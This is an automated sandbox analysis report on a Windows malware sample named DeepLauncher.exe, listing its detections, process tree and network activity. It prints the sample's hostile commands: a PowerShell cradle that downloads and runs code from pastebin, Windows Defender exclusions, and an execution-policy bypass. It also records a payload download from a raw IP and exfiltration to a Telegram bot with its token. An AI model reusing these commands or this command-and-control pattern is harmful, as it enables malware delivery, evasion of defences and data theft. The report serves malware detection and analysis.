Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DeepLauncher.exe

Overview

General Information

Sample name:DeepLauncher.exe
Analysis ID:1617346
MD5:34610a77f1796284eb482d216f3fa891
SHA1:d33e985b4778ccdec0033a8dcb0b2c5511c07571
SHA256:ed5f6c3296707be4114467eca72350b62409d9421f4b755a37c59d5e7b52f806
Tags:exeWHKzW2nruser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DeepLauncher.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\DeepLauncher.exe" MD5: 34610A77F1796284EB482D216F3FA891)
    • powershell.exe (PID: 7212 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7320 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7444 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7676 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 8072 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7444, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ProcessId: 7676, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 7444, ProcessName: powershell.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7676, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP", ProcessId: 7764, ProcessName: cvtres.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DeepLauncher.exe", ParentImage: C:\Users\user\Desktop\DeepLauncher.exe, ParentProcessId: 7160, ParentProcessName: DeepLauncher.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7212, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7444, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline", ProcessId: 7676, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:47:03.004157+010028033053Unknown Traffic192.168.2.749880104.26.12.20580TCP
2025-02-17T19:47:03.937311+010028033053Unknown Traffic192.168.2.749886208.95.112.180TCP
2025-02-17T19:47:07.937328+010028033053Unknown Traffic192.168.2.74991272.5.43.19580TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:47:08.873338+010018100071Potentially Bad Traffic192.168.2.749917149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:47:04.958056+010018100091Potentially Bad Traffic192.168.2.749892149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:46:34.004200+010018100002Potentially Bad Traffic192.168.2.749705104.20.3.235443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://72.5.43.195:80/8Avira URL Cloud: Label: malware
Source: http://72.5.43.195/Music.exe:Avira URL Cloud: Label: malware
Source: http://72.5.43.195/Music.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: DeepLauncher.exeVirustotal: Detection: 15%Perma Link
Source: DeepLauncher.exeReversingLabs: Detection: 24%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: DeepLauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.TraceSource.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdbhP= source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdb source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.7:49892 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49917 -> 149.154.167.220:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.7:60607 -> 162.159.36.2:53
Source: global trafficHTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="8d5826e4-873e-4468-9dee-7b0d8e150bbe"Content-Length: 681707
Source: global trafficHTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 270
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /Music.exe HTTP/1.1Host: 72.5.43.195
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: ip-api.com
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49880 -> 104.26.12.205:80
